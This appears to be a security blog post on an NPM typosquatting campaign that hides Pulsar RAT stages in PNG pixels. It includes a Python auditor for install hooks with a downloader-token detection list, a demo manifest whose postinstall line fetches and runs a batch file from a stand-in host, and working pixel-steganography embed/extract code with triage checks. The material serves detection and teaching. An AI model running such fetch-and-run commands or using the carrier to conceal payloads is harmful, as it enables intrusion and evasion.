👤 SECPULSE
🗓️ 24 Feb 2026  

Stealth by Pixels: How Hackers Use Images to Hijack Developer Machines Worldwide

Subtitle: Cybercriminals are weaponizing innocent-looking PNG files to evade security tools and deploy powerful remote access trojans onto Windows systems via poisoned NPM packages.

It started with a typo. A developer, perhaps rushing through a late-night coding session, mistypes a package name and installs “buildrunner-dev” from NPM, assuming it is a maintained fork of a familiar tool. Unbeknownst to them, that one install command opens the door to one of the most sophisticated supply-chain attacks in recent memory: malware delivered not as recognisable code on disk, but hidden within the pixels of harmless-looking images.

The attack chain is a masterclass in deception. The “buildrunner-dev” package, uploaded to the NPM registry, masquerades as a legitimate tool. Its source code appears innocuous, but a post-install script, which npm runs automatically the moment the package is installed, quietly downloads an obfuscated batch file from a remote repository. That batch file, padded with junk data and misleading comments, is designed to fool both static analysis and casual human review.
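The install hook is the one link in this chain a developer can inspect before anything runs. The script below is an added example, not the campaign's code and not the real package's manifest: it reads a package.json (for instance one pulled down with `npm pack <name>` rather than `npm install`), reports every lifecycle hook npm would execute automatically, and escalates any hook that shells out to a downloader, an interpreter, or an encoded command. Both manifests embedded in it are constructed for the demo; the token list is a heuristic starting point, not a complete signature set.

```python
"""Flag install-time lifecycle hooks in an npm manifest before letting npm run them."""
from __future__ import annotations

import json
import re
import sys

LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare", "prepublish")

# Tokens that rarely belong in a build tool's install hook: downloaders, shells,
# encoders and script droppers. Heuristic list, extend for your environment.
SUSPICIOUS = re.compile(
    r"(\b(curl|wget|certutil|bitsadmin|powershell|pwsh|cmd|mshta|rundll32|iwr|iex|"
    r"invoke-webrequest|invoke-expression|downloadstring|downloadfile|frombase64string|"
    r"base64|eval|child_process)\b|-encodedcommand\b|-enc\b|\.(bat|cmd|ps1|vbs|hta)\b)",
    re.IGNORECASE,
)
URL = re.compile(r"https?://[^\s'\"]+")


def audit_manifest(manifest: dict) -> list[dict]:
    """One finding per lifecycle hook present: 'high' if it downloads or shells out, else 'review'."""
    findings = []
    scripts = manifest.get("scripts") or {}
    for hook in LIFECYCLE_HOOKS:
        cmd = scripts.get(hook)
        if not cmd:
            continue
        tokens = sorted({m.group(0).lower() for m in SUSPICIOUS.finditer(cmd)})
        urls = URL.findall(cmd)
        findings.append({
            "hook": hook,
            "command": cmd,
            "suspicious_tokens": tokens,
            "urls": urls,
            "severity": "high" if tokens or urls else "review",
        })
    return findings


def audit_file(path: str) -> list[dict]:
    """Audit a package.json on disk, e.g. extracted from `npm pack <name>` without installing it."""
    with open(path, "r", encoding="utf-8") as fh:
        return audit_manifest(json.load(fh))


# Constructed manifests for the demo; neither reproduces the real package's content.
TROJANIZED_MANIFEST = {
    "name": "example-build-tool",
    "version": "1.0.3",
    "scripts": {
        "build": "tsc -p .",
        "postinstall": ("node scripts/setup.js && powershell -NoProfile -c "
                        "\"iwr https://example.invalid/r.bat -OutFile $env:TEMP\\r.bat; & $env:TEMP\\r.bat\""),
    },
}
BENIGN_MANIFEST = {"name": "example-lib", "scripts": {"prepare": "husky install", "test": "jest"}}


if __name__ == "__main__":
    results = audit_file(sys.argv[1]) if len(sys.argv) > 1 else audit_manifest(TROJANIZED_MANIFEST)
    for f in results:
        print(f"[{f['severity']}] {f['hook']}: {f['command']}")
        if f["suspicious_tokens"] or f["urls"]:
            print("   tokens:", f["suspicious_tokens"], "urls:", f["urls"])
```

A `review` finding is not an indictment; plenty of legitimate packages use `prepare` or `postinstall` for builds. The point is that nothing with a lifecycle hook should run unseen: `npm install --ignore-scripts` (or `npm config set ignore-scripts true`) stops npm executing these hooks at all, and the tarball can then be read before deciding whether to allow them.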

Once installed, the script copies itself to the Windows Startup folder, ensuring it runs at every logon. If administrator rights are needed, it uses a Windows UAC bypass to elevate without triggering the consent prompt. The real work, however, happens next: the batch file launches a PowerShell script that fetches what appear to be ordinary PNG images from a public image-hosting site.

These images are anything but ordinary. Using a custom steganographic routine, the malware extracts embedded code from the color values of each pixel. The first two pixels encode the payload size, and the pixels that follow carry the encrypted script - invisible to the naked eye and to scanners that treat the file as a picture rather than as a container for code. The extracted code disables Microsoft’s AMSI (Antimalware Scan Interface) in the PowerShell process, so the script stages that follow are never handed to the installed antivirus for inspection.
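To make the pixel-carrier idea concrete, here is an added, self-contained example (not the campaign's code). It builds a small PNG from a smooth gradient, overwrites the leading pixel values with a size header followed by a stand-in "encrypted script" (random bytes, constructed for the demo), reads the pixels back out of the PNG the way a loader would, and then runs two triage checks a defender can apply to an image pulled from a suspicious PowerShell session. The article only says the first two pixels hold the size; the exact layout used here (a little-endian 32-bit length in the first four channel bytes, two bytes of padding) is an assumption, as are the entropy threshold and the gradient cover.

```python
"""Demo of a pixel-value steganography carrier plus two triage checks (stdlib only)."""
from __future__ import annotations

import math
import random
import struct
import zlib
from collections import Counter

PNG_SIG = b"\x89PNG\r\n\x1a\n"
HEADER_BYTES = 6  # two RGB pixels; assumed layout: little-endian uint32 size + two pad bytes


def _chunk(tag: bytes, data: bytes) -> bytes:
    """Length + type + data + CRC32, as the PNG spec lays out every chunk."""
    return struct.pack(">I", len(data)) + tag + data + struct.pack(">I", zlib.crc32(tag + data))


def build_png(width: int, height: int, rgb: bytes) -> bytes:
    """Serialize raw RGB bytes as a minimal valid 8-bit truecolor PNG (filter type 0 on every row)."""
    if len(rgb) != width * height * 3:
        raise ValueError("rgb length does not match dimensions")
    stride = width * 3
    raw = b"".join(b"\x00" + rgb[y * stride:(y + 1) * stride] for y in range(height))
    ihdr = struct.pack(">IIBBBBB", width, height, 8, 2, 0, 0, 0)
    return PNG_SIG + _chunk(b"IHDR", ihdr) + _chunk(b"IDAT", zlib.compress(raw)) + _chunk(b"IEND", b"")


def read_png_rgb(png: bytes) -> tuple[int, int, bytes]:
    """Parse the PNG produced by build_png back into (width, height, rgb). Handles only unfiltered rows."""
    if png[:8] != PNG_SIG:
        raise ValueError("not a PNG")
    pos, width, height, idat = 8, 0, 0, b""
    while pos + 8 <= len(png):
        length, tag = struct.unpack(">I4s", png[pos:pos + 8])
        data = png[pos + 8:pos + 8 + length]
        if tag == b"IHDR":
            width, height, depth, ctype = struct.unpack(">IIBB", data[:10])
            if (depth, ctype) != (8, 2):
                raise ValueError("demo only handles 8-bit RGB")
        elif tag == b"IDAT":
            idat += data
        pos += 12 + length  # 4 length + 4 type + data + 4 CRC
    raw, stride, rows = zlib.decompress(idat), width * 3, []
    for y in range(height):
        row = raw[y * (stride + 1):(y + 1) * (stride + 1)]
        if row[0] != 0:
            raise ValueError("demo only handles filter type 0")
        rows.append(row[1:])
    return width, height, b"".join(rows)


def embed(cover_rgb: bytes, payload: bytes) -> bytes:
    """Overwrite the leading pixel values with a size header and the payload; the rest of the cover stays."""
    body = struct.pack("<I", len(payload)) + b"\x00\x00" + payload
    if len(body) > len(cover_rgb):
        raise ValueError("cover image too small for payload")
    return body + cover_rgb[len(body):]


def extract(rgb: bytes) -> bytes:
    """What a loader does: read the size from the first two pixels, then slice that many bytes after them."""
    size = struct.unpack("<I", rgb[:4])[0]
    return rgb[HEADER_BYTES:HEADER_BYTES + size]


def delta_entropy(rgb: bytes) -> float:
    """Shannon entropy (bits/byte) of per-channel differences between neighbouring pixels.
    Natural images change gradually, so deltas cluster near 0; encrypted bytes do not."""
    deltas = bytes((rgb[i] - rgb[i - 3]) & 0xFF for i in range(3, len(rgb)))
    if not deltas:
        return 0.0
    n = len(deltas)
    return -sum(c / n * math.log2(c / n) for c in Counter(deltas).values())


def looks_like_carrier(rgb: bytes, threshold: float = 6.0) -> dict:
    """Triage heuristic: a size header that fits inside the image AND noise-like colour data in that span."""
    size = struct.unpack("<I", rgb[:4])[0]
    fits = 0 < size <= len(rgb) - HEADER_BYTES
    region = rgb[HEADER_BYTES:HEADER_BYTES + size] if fits else rgb[HEADER_BYTES:]
    ent = round(delta_entropy(region), 2)
    return {"declared_size": size, "size_fits": fits, "delta_entropy": ent, "suspicious": fits and ent > threshold}


def demo(width: int = 64, height: int = 64, payload_len: int = 2000) -> dict:
    """Gradient cover, random stand-in for the encrypted script, PNG round trip, both checks on both images."""
    cover = bytes(v for y in range(height) for x in range(width)
                  for v in (x * 255 // (width - 1), y * 255 // (height - 1), 128))
    rng = random.Random(1234)  # deterministic; stands in for ciphertext, constructed for the demo
    payload = bytes(rng.randrange(256) for _ in range(payload_len))
    _, _, rgb = read_png_rgb(build_png(width, height, embed(cover, payload)))
    return {"roundtrip_ok": extract(rgb) == payload,
            "clean": looks_like_carrier(cover), "stego": looks_like_carrier(rgb)}


if __name__ == "__main__":
    print(demo())
```

Two caveats for anyone turning this into a detection. The delta-entropy threshold is tuned for the synthetic gradient; real photographs have noisier deltas and PNGs using other filter types need a full decoder, so treat the score as a triage signal rather than a verdict. The more reliable detection point in this chain is behavioural: a PowerShell process spawned by a batch file that downloads image files and then never passes them to an image viewer but reads their pixels into memory.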

The next stage is a technical tour de force. A larger PNG delivers a compressed .NET loader, which uses process hollowing to inject the final malware, Pulsar RAT, into a legitimate Windows process. Further AMSI bypasses, dynamic API resolution, and layered encryption mean the decrypted stages exist only in memory; nothing recognisably malicious is ever written to disk.

Configuration data - also hidden in images - reveals the attackers’ meticulous planning: custom command-and-control channels, anti-analysis tricks, and tailored persistence strategies depending on the victim’s antivirus software. The ultimate payload, Pulsar RAT, is a Quasar-based trojan equipped for fileless operation, credential theft, stealth remote desktop, and full system takeover.

This campaign is a stark warning: the software supply chain is now a battlefield where even the humble PNG file can be weaponized. Developers - often the first line of defense - are now prime targets in a war fought with pixels, scripts, and shadows.

Conclusion: As attackers blend social engineering, steganography, and advanced evasion, the line between benign and malicious blurs. Vigilance, security hygiene, and a healthy skepticism toward third-party packages have never been more vital. In the age of invisible threats, what you don’t see can hurt you most.

WIKICROOK

  • Steganography: Steganography hides secret messages or code within everyday files, like images or audio, making the hidden information difficult to detect.
  • AMSI (Antimalware Scan Interface): AMSI is a Windows interface that lets security software inspect script content (PowerShell, VBScript, JScript, and .NET assemblies loaded from memory) at the moment it runs, after any obfuscation has been unwound and even when nothing touches the disk. That is exactly why in-memory loaders go out of their way to disable it.
  • Process Hollowing: Process hollowing is a technique where malware starts a legitimate program in a suspended state, replaces its code in memory with a malicious payload, and resumes it, so the payload runs under the legitimate process’s name and evades simple process-list checks.
  • NPM Typosquatting: NPM typosquatting is when attackers upload malicious packages with names similar to popular ones, tricking users into accidental installation and potential compromise.
  • Remote Access Trojan (RAT): A Remote Access Trojan (RAT) is malware that lets attackers secretly control a victim’s computer from anywhere, enabling theft and spying.

SECPULSE, SOC Detection Lead